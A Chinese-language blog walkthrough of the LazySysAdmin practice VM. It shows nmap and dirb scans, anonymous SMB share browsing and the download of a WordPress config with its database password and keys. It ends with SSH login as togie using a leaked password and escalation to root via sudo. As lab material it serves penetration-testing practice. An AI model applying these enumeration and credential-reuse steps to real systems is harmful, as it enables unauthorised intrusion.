靶场63 | HexBlog

先看看网站源代码找到图片存放的位置,看到一个特殊文件名,base64解密

1 2	AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4 I$8b4f5a97-4757-4157-afe8-9a1a8

nmap

# divint3 @ Divint3 in ~ [21:49:41] C:130
$ nmap 172.17.135.63 -sV -Pn

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-27 21:53 CST
Nmap scan report for 172.17.135.63
Host is up (0.020s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.79 seconds

# divint3 @ Divint3 in ~ [21:53:15] 
$ nmap 172.17.135.63 -sV -Pn -A

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-27 21:53 CST
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Nmap scan report for 172.17.135.63
Host is up (0.015s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|_  256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1.0
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 10.160.110.191
|_  error: Closing link: (nmap@10.160.110.191) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 40m48s, deviation: 0s, median: 40m48s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2019-05-28T00:34:48+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.90 seconds

祭出dirb




-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 27 21:38:27 2019
URL_BASE: http://172.17.135.63/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://172.17.135.63/ ----
==> DIRECTORY: http://172.17.135.63/apache/                                                                                                                                                    
+ http://172.17.135.63/index.html (CODE:200|SIZE:36072)                                                                                                                                        
+ http://172.17.135.63/info.php (CODE:200|SIZE:77255)                                                                                                                                          
==> DIRECTORY: http://172.17.135.63/javascript/                                                                                                                                                
==> DIRECTORY: http://172.17.135.63/old/                                                                                                                                                       
==> DIRECTORY: http://172.17.135.63/phpmyadmin/                                                                                                                                                
+ http://172.17.135.63/robots.txt (CODE:200|SIZE:92)                                                                                                                                           
+ http://172.17.135.63/server-status (CODE:403|SIZE:293)                                                                                                                                       
==> DIRECTORY: http://172.17.135.63/test/                                                                                                                                                      
==> DIRECTORY: http://172.17.135.63/wordpress/                                                                                                                                                 
==> DIRECTORY: http://172.17.135.63/wp/

匿名访问smb

# divint3 @ Divint3 in ~ [22:46:26] 
$ smbclient -L 172.17.135.63    
WARNING: The "syslog" option is deprecated
Enter divint3's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        share$          Disk      Sumshare
        IPC$            IPC       IPC Service (Web server)
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

        Server               Comment
        ---------            -------
        DESKTOP-IN4T2GV      
        LAZYSYSADMIN         Web server

        Workgroup            Master
        ---------            -------
        WORKGROUP            DESKTOP-IN4T2GV


# divint3 @ Divint3 in ~ [22:20:32] 
$ smbclient //172.17.135.63/share$

WARNING: The "syslog" option is deprecated
Enter divint3's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Aug 15 19:05:52 2017
  ..                                  D        0  Mon Aug 14 20:34:47 2017
  wordpress                           D        0  Tue Aug 15 19:21:08 2017
  Backnode_files                      D        0  Mon Aug 14 20:08:26 2017
  wp                                  D        0  Tue Aug 15 18:51:23 2017
  deets.txt                           N      139  Mon Aug 14 20:20:05 2017
  robots.txt                          N       92  Mon Aug 14 20:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 20:39:56 2017
  apache                              D        0  Mon Aug 14 20:35:19 2017
  index.html                          N    36072  Sun Aug  6 13:02:15 2017
  info.php                            N       20  Tue Aug 15 18:55:19 2017
  test                                D        0  Mon Aug 14 20:35:10 2017
  old                                 D        0  Mon Aug 14 20:35:13 2017

                3029776 blocks of size 1024. 1237820 blocks available
smb: \> get todolist.txt 
getting file \todolist.txt of size 79 as todolist.txt (8.6 KiloBytes/sec) (average 8.6 KiloBytes/sec)
smb: \> get deets.txt 
getting file \deets.txt of size 139 as deets.txt (5.0 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> 
smb: \> cd wordpress
smb: \wordpress\> ls
  .                                   D        0  Tue Aug 15 19:21:08 2017
  ..                                  D        0  Tue Aug 15 19:05:52 2017
  wp-config-sample.php                N     2853  Wed Dec 16 17:58:26 2015
  wp-trackback.php                    N     4513  Sat Oct 15 03:39:28 2016
  wp-admin                            D        0  Thu Aug  3 05:02:02 2017
  wp-settings.php                     N    16200  Fri Apr  7 02:01:42 2017
  wp-blog-header.php                  N      364  Sat Dec 19 19:20:28 2015
  index.php                           N      418  Wed Sep 25 08:18:11 2013
  wp-cron.php                         N     3286  Mon May 25 01:26:25 2015
  wp-links-opml.php                   N     2422  Mon Nov 21 10:46:30 2016
  readme.html                         N     7413  Mon Dec 12 16:01:39 2016
  wp-signup.php                       N    29924  Tue Jan 24 19:08:42 2017
  wp-content                          D        0  Mon Aug 21 18:07:27 2017
  license.txt                         N    19935  Tue Jan  3 01:58:42 2017
  wp-mail.php                         N     8048  Wed Jan 11 13:13:43 2017
  wp-activate.php                     N     5447  Wed Sep 28 05:36:28 2016
  .htaccess                           H       35  Tue Aug 15 19:40:13 2017
  xmlrpc.php                          N     3065  Thu Sep  1 00:31:29 2016
  wp-login.php                        N    34327  Sat May 13 01:12:46 2017
  wp-load.php                         N     3301  Tue Oct 25 11:15:30 2016
  wp-comments-post.php                N     1627  Mon Aug 29 20:00:32 2016
  wp-config.php                       N     3703  Mon Aug 21 17:25:14 2017
  wp-includes                         D        0  Thu Aug  3 05:02:03 2017

                3029776 blocks of size 1024. 1237744 blocks available
smb: \wordpress\> get wp-config.php 
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (452.0 KiloBytes/sec) (average 452.0 KiloBytes/sec)
smb: \wordpress\>

deets.txt

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

todolist.txt

1	Prevent users from being able to view to web root using the local file browser

wp-config.php的内容包含数据库配置,故下载

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */

define('AUTH_KEY',         'SAq-)W,-K9tFcW(=?ro4SJ5)R.mx%+@KL-I@PB{<-i>g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY',  'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY',    'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY',        ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT',        '(:^<BWwzWYx ,f^9anxD,+V+2-&,VJ@@)U7CSzjv_MvD67>?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT',   '=M_DRp%vGmijIhl%K!(v>:,*RR<cl9ahav%{q`&I/0HD/$W/LK:mxR37PKh?Zzi8');
define('NONCE_SALT',       'ABOgE>G:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');

;

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');


/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

访问http://172.17.135.63/wordpress/ 得到提示,my name is togie.

ssh链接ssh togie@172.17.135.63密码12345

1 2	togie@LazySysAdmin:~$ cd -rbash: cd: restricted

切换至bash

sudo -s提权到root

togie@LazySysAdmin:~$ sudo -s
[sudo] password for togie: 
root@LazySysAdmin:~# whoami
root
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)

root依然默认使用rbash切换到bash,但是从passwd中看是bash,但是就是不能用cd

root@LazySysAdmin:/root# cat proof.txt 
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu